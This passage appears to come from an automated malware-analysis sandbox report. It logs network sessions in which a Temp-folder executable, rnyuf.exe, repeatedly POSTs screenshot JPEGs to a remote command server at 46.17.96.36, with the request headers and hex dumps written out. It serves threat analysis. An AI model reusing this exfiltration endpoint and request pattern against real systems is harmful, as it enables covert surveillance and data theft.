                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:25.687859058 CEST4985OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:25.687964916 CEST4988OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:25.721311092 CEST4991OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:25.721363068 CEST5015OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:25.837187052 CEST5060INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        36192.168.2.44977246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:26.137660980 CEST5060OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----c5a841f4f1c49d0b014c71075a2e4e94
                                        Host: 46.17.96.36
                                        Content-Length: 109415
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:26.137758017 CEST5060OUTData Raw: 2d 2d 2d 2d 2d 2d 63 35 61 38 34 31 66 34 66 31 63 34 39 64 30 62 30 31 34 63 37 31 30 37 35 61 32 65 34 65 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------c5a841f4f1c49d0b014c71075a2e4e94Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:26.137959003 CEST5071OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:26.138165951 CEST5073OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:26.173444986 CEST5076OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:26.173578024 CEST5079OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:26.173594952 CEST5081OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:26.173918962 CEST5099OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:26.209224939 CEST5101OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:26.209259987 CEST5109OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:26.209327936 CEST5115OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:26.320451975 CEST5170INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        37192.168.2.44977346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:26.571950912 CEST5171OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----c5a841f4f1c49d0b014c71075a2e4e94
                                        Host: 46.17.96.36
                                        Content-Length: 109415
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:26.572102070 CEST5171OUTData Raw: 2d 2d 2d 2d 2d 2d 63 35 61 38 34 31 66 34 66 31 63 34 39 64 30 62 30 31 34 63 37 31 30 37 35 61 32 65 34 65 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------c5a841f4f1c49d0b014c71075a2e4e94Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:26.572484970 CEST5181OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:26.572746992 CEST5184OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:26.604614019 CEST5200OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:26.604990005 CEST5204OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:26.605118990 CEST5209OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:26.636812925 CEST5220OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:26.640861988 CEST5259OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:26.671479940 CEST5262OUTData Raw: 46 ea ab 8a c4 b9 a3 35 1e ea 37 51 71 58 93 34 66 99 9a 33 45 c2 c3 c9 a4 cd 30 b5 26 ea 2e 1c a3 f3 41 6a 8f 70 a4 2d 4b 98 7c a3 c9 a6 93 4d 2d 48 5a a5 b2 ac 2e 69 09 a6 13 48 5a a6 e5 24 38 b5 34 b5 34 9a 69 35 2d 96 90 ec d3 49 a4 26 9a 4d
                                        Data Ascii: F57QqX4f3E0&.Ajp-K|M-HZ.iHZ$844i5-I&MMHq4iSsHR%%MM74QpMIEXRi@>p4.h%!8qXRi0HyjBr)i\Z3M- 3ZWl?UZ}DLOqkml9H|kj
                                        Aug 29, 2021 22:27:26.671611071 CEST5279OUTData Raw: b0 fc d1 9a 8f 3c d2 e6 8b 85 87 e6 8c d3 37 52 66 95 c2 c3 f3 ef 46 7d ea 3c d1 9a 2e 3b 0f 26 93 26 9b 9a 6e 69 5c 76 1f 9a 42 69 a4 d1 9a 57 1d 85 cd 26 69 33 48 4d 21 d8 5a 4a 33 48 69 5c 76 02 69 09 a2 9b 52 31 73 ed 4b 9a 65 19 a2 e3 b0 ec
                                        Data Ascii: <7RfF}<.;&&ni\vBiW&i3HM!ZJ3Hi\viR1sKeM!j.i:SML4\vS3@4JJ@x&M4BilM+)(qRLLEV_!XCF_SSZ:((*H)K,w4NP=N
                                        Aug 29, 2021 22:27:26.746438026 CEST5280INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        38192.168.2.44977446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:26.991599083 CEST5281OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2e97d6ab67dd52d2b0448fb19f95ffa5
                                        Host: 46.17.96.36
                                        Content-Length: 109366
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:26.991736889 CEST5281OUTData Raw: 2d 2d 2d 2d 2d 2d 32 65 39 37 64 36 61 62 36 37 64 64 35 32 64 32 62 30 34 34 38 66 62 31 39 66 39 35 66 66 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2e97d6ab67dd52d2b0448fb19f95ffa5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:26.991972923 CEST5291OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:26.992168903 CEST5294OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:27.035253048 CEST5319OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:27.070874929 CEST5322OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:27.070911884 CEST5327OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:27.070974112 CEST5335OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:27.071047068 CEST5353OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:27.071295977 CEST5369OUTData Raw: 46 c3 f0 a8 ca b0 ec 69 a9 a8 dd a9 f9 67 7f c4 e7 f9 d4 c3 56 b8 23 12 2c 52 7d 53 fc 28 e6 9a e8 2e 42 3e 69 73 cd 4c 35 08 89 f9 ed 13 fe 02 d8 a7 0b 8b 17 3c c5 22 fd 39 a7 ce fa a2 79 08 33 4a 0d 58 c5 83 f4 9d 97 ea b5 22 da 40 e3 e4 bb 88
                                        Data Ascii: FigV#,R}S(.B>isL5<"9y3JX"@[[\jQ*smqV:;K!\85JCTZcv_^*@ LTiy_#<lrqt~7SZPWbGAD(Idg:
                                        Aug 29, 2021 22:27:27.107186079 CEST5372OUTData Raw: 46 ea ab 8a c4 b9 a3 35 1e ea 37 51 71 58 93 34 66 99 9a 33 45 c2 c3 c9 a4 cd 30 b5 26 ea 2e 1c a3 f3 41 6a 8f 70 a4 2d 4b 98 7c a3 c9 a6 93 4d 2d 48 5a a5 b2 ac 2e 69 09 a6 13 48 5a a6 e5 24 38 b5 34 b5 34 9a 69 35 2d 96 90 ec d3 49 a4 26 9a 4d
                                        Data Ascii: F57QqX4f3E0&.Ajp-K|M-HZ.iHZ$844i5-I&MMHq4iSsHR%%MM74QpMIEXRi@>p4.h%!8qXRi0HyjBr)i\Z3M- 3ZWl?UZ}DLOqkml9H|kj
                                        Aug 29, 2021 22:27:27.181555033 CEST5390INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        39192.168.2.44977546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:27.401290894 CEST5391OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0eca12f9569ffde04e01e318ef40cd43
                                        Host: 46.17.96.36
                                        Content-Length: 109213
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:27.401446104 CEST5391OUTData Raw: 2d 2d 2d 2d 2d 2d 30 65 63 61 31 32 66 39 35 36 39 66 66 64 65 30 34 65 30 31 65 33 31 38 65 66 34 30 63 64 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0eca12f9569ffde04e01e318ef40cd43Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:27.401657104 CEST5401OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:27.401751041 CEST5404OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:27.436700106 CEST5407OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:27.436750889 CEST5409OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
